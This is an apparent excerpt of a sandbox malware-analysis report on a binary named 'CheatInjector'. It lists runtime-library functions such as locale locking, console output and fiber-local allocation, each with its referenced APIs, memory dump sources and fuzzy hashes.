                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                • String ID:
                                                                • API String ID: 459529453-0
                                                                • Opcode ID: 877fac0b0c7a547477316eb583a3f7498aa2018fa5ea6636c28a2d058931463e
                                                                • Instruction ID: bc861a2c2446fdbe8ee3e6a465be2d974dff3b24c5b11c9106628bbbc78f984c
                                                                • Opcode Fuzzy Hash: 877fac0b0c7a547477316eb583a3f7498aa2018fa5ea6636c28a2d058931463e
                                                                • Instruction Fuzzy Hash: 5501F73E504114BBCB54AF65C845EAE7B689F9232CB10415EF502A73A1EF78AF01C788
                                                                Function 004C1F45 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004C1F51
                                                                • int.LIBCPMT ref: 004C1F64
                                                                  • Part of subcall function 004C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 004C2B9C
                                                                  • Part of subcall function 004C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 004C2BB6
                                                                • std::_Facet_Register.LIBCPMT ref: 004C1F97
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004C1FAD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                • String ID:
                                                                • API String ID: 459529453-0
                                                                • Opcode ID: 5115cb946abdc671df168f557ff17659070f101cc4790a95be5ad4f53f54be9c
                                                                • Instruction ID: eaa40f20061540c0371e492cdb0a9bfaad39ddff63ebcf3a564c09437e4b6f7b
                                                                • Opcode Fuzzy Hash: 5115cb946abdc671df168f557ff17659070f101cc4790a95be5ad4f53f54be9c
                                                                • Instruction Fuzzy Hash: 1C01F73A900514ABCB54AF56C806EAE77689F92368B10415FF801A73A1EB38EF01D7C8
                                                                Function 004C1FBE Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004C1FCA
                                                                • int.LIBCPMT ref: 004C1FDD
                                                                  • Part of subcall function 004C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 004C2B9C
                                                                  • Part of subcall function 004C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 004C2BB6
                                                                • std::_Facet_Register.LIBCPMT ref: 004C2010
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004C2026
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                • String ID:
                                                                • API String ID: 459529453-0
                                                                • Opcode ID: bbcbdd8fb7c067c138b0ac2bda68040e469f972eb4c810d7bdc9397250afc2f0
                                                                • Instruction ID: b60347c2a40695e6f807a2e9dc4632f563ce86c5a15ffae1f430727e2932a14f
                                                                • Opcode Fuzzy Hash: bbcbdd8fb7c067c138b0ac2bda68040e469f972eb4c810d7bdc9397250afc2f0
                                                                • Instruction Fuzzy Hash: F301FC3E500514ABCB55AF56D905EAE7B68DF40364B10414FF50197251DFB8AF41C788
                                                                Function 004E1FD1 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,004DEFE9,00000000,00000001,00000000,00000000,?,004D67A7,00000000,00000000,00000000), ref: 004E1FE8
                                                                • GetLastError.KERNEL32(?,004DEFE9,00000000,00000001,00000000,00000000,?,004D67A7,00000000,00000000,00000000,00000000,00000000,?,004D6D65,00000000), ref: 004E1FF4
                                                                  • Part of subcall function 004E1FBA: CloseHandle.KERNEL32(FFFFFFFE,004E2004,?,004DEFE9,00000000,00000001,00000000,00000000,?,004D67A7,00000000,00000000,00000000,00000000,00000000), ref: 004E1FCA
                                                                • ___initconout.LIBCMT ref: 004E2004
                                                                  • Part of subcall function 004E1F7C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004E1FAB,004DEFD6,00000000,?,004D67A7,00000000,00000000,00000000,00000000), ref: 004E1F8F
                                                                • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,004DEFE9,00000000,00000001,00000000,00000000,?,004D67A7,00000000,00000000,00000000,00000000), ref: 004E2019
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                • String ID:
                                                                • API String ID: 2744216297-0
                                                                • Opcode ID: aed817b834046c097207b4861f8b8df46b84d483c525e399f088bde5c1a9af0c
                                                                • Instruction ID: d6f36212c708c2afffb1f619b9cb706178d450cadec30225662105dd69aab591
                                                                • Opcode Fuzzy Hash: aed817b834046c097207b4861f8b8df46b84d483c525e399f088bde5c1a9af0c
                                                                • Instruction Fuzzy Hash: EBF01236400165BBCF121FD6EC4598A7F66FF49365F444021FB0885172C7318C60EBD8
                                                                Function 004CA7AD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • EncodePointer.KERNEL32(00000000,?), ref: 004CA7D2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID: MOC$RCC
                                                                • API String ID: 2118026453-2084237596
                                                                • Opcode ID: f8b21d3ec7e2fed661ff197fe475863325312f8fcc5d444f6c3d9f9c6956ce31
                                                                • Instruction ID: 84a23e356dc431afa5339f19d0f84675e62ca8bf14bdb32d42d3a819871da530
                                                                • Opcode Fuzzy Hash: f8b21d3ec7e2fed661ff197fe475863325312f8fcc5d444f6c3d9f9c6956ce31
                                                                • Instruction Fuzzy Hash: B641593590020DAFCF55DF94C981EAEBBB5FF48308F14806EFA0467211D2399961DB66
                                                                Function 004C616F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004C617B
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004C61D7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID: F<L
                                                                • API String ID: 593203224-2278513700
                                                                • Opcode ID: 5679957f6a8f00eefed0d8e4d0792179b5b238876d0d1055e51dbf75d0399945
                                                                • Instruction ID: d807ef810a5b99ffdc1c2849a573d60b678a6fb094c91f14924e1cd796c37ee4
                                                                • Opcode Fuzzy Hash: 5679957f6a8f00eefed0d8e4d0792179b5b238876d0d1055e51dbf75d0399945
                                                                • Instruction Fuzzy Hash: 51019239600615EFCB05DF15C885E9E7BB4EF84354B0940AEE4019B361DF70EE44CB54
                                                                Function 004C75A9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004C75B4
                                                                • ___raise_securityfailure.LIBCMT ref: 004C7671
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                • String ID: q*M
                                                                • API String ID: 3761405300-3446942320
                                                                • Opcode ID: ef82229e5077ccd09e146ac79df12f207be38971ee4a4cd90b991dddfb331b2a
                                                                • Instruction ID: e7e9115ade2c540495ed5c6cf0052e50847743a18abba1625416fdc122a2eca2
                                                                • Opcode Fuzzy Hash: ef82229e5077ccd09e146ac79df12f207be38971ee4a4cd90b991dddfb331b2a
                                                                • Instruction Fuzzy Hash: A411BFFC550205AFD704EF15E8866817BA4FF2A308B10512AE8888B371E374A749AF45
                                                                Function 004C235D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004C2364
                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004C239C
                                                                  • Part of subcall function 004C61E0: _Yarn.LIBCPMT ref: 004C61FF
                                                                  • Part of subcall function 004C61E0: _Yarn.LIBCPMT ref: 004C6223
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                • String ID: bad locale name
                                                                • API String ID: 1908188788-1405518554
                                                                • Opcode ID: 3ef6b3b6b3db803dfb349cec9f716d692112b90c566639b0991100eb18ee8b77
                                                                • Instruction ID: 825c1ce8173dd8cacc567cc36a6fccb6d37a3baf8f0795635c96a216fb94cf69
                                                                • Opcode Fuzzy Hash: 3ef6b3b6b3db803dfb349cec9f716d692112b90c566639b0991100eb18ee8b77
                                                                • Instruction Fuzzy Hash: D2F06776405B809E83308F7B8481907FBE4BE282113908A2FE0DEC3A11C738E104CBAE
                                                                Function 004D5A41 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 004D5A81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                • String ID: F<L$InitializeCriticalSectionEx
                                                                • API String ID: 2593887523-172955531
                                                                • Opcode ID: 3832c9a99ea4b34ce6eb0ac3f0cefb5179c3d08f9495ac0135884aefca004c5e
                                                                • Instruction ID: 6953cbe5816544f35d5ded809623e92e75fd5f31d7646588fe19e1f99dd834db
                                                                • Opcode Fuzzy Hash: 3832c9a99ea4b34ce6eb0ac3f0cefb5179c3d08f9495ac0135884aefca004c5e
                                                                • Instruction Fuzzy Hash: A6E092365802A8BBCF111F92CC15EAE7F11DB54B62F104023FD1C29260CE768961AAD8
                                                                Function 004D58C7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: Alloc
                                                                • String ID: F<L$FlsAlloc
                                                                • API String ID: 2773662609-2420303677
                                                                • Opcode ID: e2492ae7705d62e8cdcc3fbb0cb18e6debd4780d0b79e21b869756df841d3ec8
                                                                • Instruction ID: a3b4a14960cb20c3a3aa21711cb0796918705d0ee5fb34c5f8b66fa5833d0a3e
                                                                • Opcode Fuzzy Hash: e2492ae7705d62e8cdcc3fbb0cb18e6debd4780d0b79e21b869756df841d3ec8
                                                                • Instruction Fuzzy Hash: 83E0CD31684754B38A1037565C16A5F7F048B54F72B110473FE08663928DB9095165ED